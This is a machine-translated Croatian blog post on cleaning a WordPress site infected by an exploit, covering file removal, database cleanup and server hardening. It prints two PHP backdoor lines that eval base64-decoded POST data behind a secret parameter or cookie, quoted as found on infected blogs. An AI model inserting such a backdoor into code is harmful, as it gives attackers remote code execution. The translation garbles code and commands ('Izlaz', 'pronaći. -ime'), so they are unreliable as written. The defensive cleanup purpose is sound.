WordPress Exploit - Očistite virusne datoteke, SQL i sigurnost poslužitelja.

Prije nego što pročitate ovaj post, trebali biste vidjeti , Da bi razumjeli nešto. :)

Pronašao sam ga u nekoliko skrivenih blogovskih datotekasettings.com, kodovi slični onima prikazanim u nastavku kao rezultat zaraze virusom WordPress iskorištavaju.:

<?php if($_GET[‘573abcb060974771’]==”8e96d1b4b674e1d2″){ eval(base64_decode($_POST[‘file'])); Izlaz; }?>

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file'])); Izlaz; }?>

xmlrpcAko gore je o datoteci xmlrpc.php od pospan, U grep poslužitelja, izgleda dosta ove vrste u source koda.

pppffiuuu

Čišćenje zaraženih datoteka:

Ooookkkk ...
1. Najbolje rješenje, kao što je to učinjeno rezervaI čisti baza je brisanje slika WordPress (wp-config.php i datoteke koje nisu strogo povezane s wp platformom možete zadržati s poslužitelja i prenijeti izvorne iz verzije 2.5.1 (Na tom prigodom i napraviti nadogradnju verzije :) wp) http://wordpress.org/download/ . Obrišite uključujući i tematski datoteke ako ne vjeruju da njihov pažljivoj provjeri.

Čini se da su pogođeni i slika od tema koje nisu korištene prije nego što se na blogu i jednostavno mijenjanje teme, ne riješiti problem.

./andreea/wp-content/themes/default/index.php:<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file'])); Izlaz; }?>

2. Pretraživanje i brisanje svih datoteka koje sadrže:... * _new.php, * _old.php, * Jpgg, * Giff, * Pngg i wp-info.txt datoteku, ako ih ima.

pronaći. -ime “* _new.php”
pronaći. -ime “* _old.php”
pronaći. -ime "* .jpgg"
pronaći. -ime “* _giff”
pronaći. -ime “* _pngg”
pronaći. -ime “wp-info.txt”

3. u / Tmp , Pretraživanje i brisanje mape kao što su tmpYwbzT2

SQL čišćenje :

1. i Tablica wp_options Provjerite i brisanje linije: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Sve u wp_options, idite na active_plugins i izbrisati ako postoji plugin koji završava u jednom od nastavaka * _new.php, * _old.php, *. jpgg, *. giff, *. pngg ili ako se sumnja na drugom lokalnom, pažljivo provjerite.

3. U tablici wp_users, Vidjeti postoji li korisnik koji nije napisao ništa u svojoj desnoj strani, stupac user_nicename. Brisanje korisnika, ali imajte na umu broj na ID stupac. Ovaj korisnik može koristiti "WordPress" kao user_login stvara se i pojavljuje se na 00: 00: 00 0000-00-00.

4. Idi na tablici wp_usermeta i izbrisati sve linije koje pripadaju ID gore.

Nakon što izvršite ovo čišćenje SQL-a, onemogućite i aktivirajte bilo koji dodatak. (u blogu -> Nadzorna ploča -> Dodaci)

Sigurna poslužitelja:

1. Pogledajte što direktorije i datoteke "pisati"(Chmod 777) i pokušati staviti na njih u chmod da neće dopustiti svoje pisanje na bilo kojoj razini. (Chmod 644, primjerice)

Pronađite. -Perm-2-LS

2. Pogledajte što slika postavljen bit suid ili SGID . Ako ne koristite te datoteke staviti na njih chmod 0 ili deinstalirati paket koji sadrži. Oni su vrlo opasni, jer oni izvršavati privilegije "skupina"Ili"korijen"Ne s normalnim korisnik povlastice izvršiti tu datoteku.

pronaći /-tip f-Perm-04000-LS
pronaći /-tip f-Perm-02000-LS

3. Provjerite što portovi su otvoreni i pokušajte zatvoriti ili osigurati onima koji se ne koriste.

netstat-| grep-i slušanje

Toliko. Vidim Google Search i drugi kažu: "Pa jesu!". Pa dobro što su to učinili ... ali znate li Google počinje zabrana sve web stranice formiranje  SPAM i staviti trojanaca (Trojan.Clicker.HTML) u kolačićima?

WordPress Exploit - Očistite virusne datoteke, SQL i sigurnost poslužitelja.

O autoru

potajno

Zaljubljen u sve gadgete i IT, pišem sa zadovoljstvom u stealthusettings.com od 2006. godine i volim s vama otkriti nove stvari o računalima i operativnim sustavima macOS, Linux, Windows, iOS i Android.

Dodaj komentar

Ostavite komentar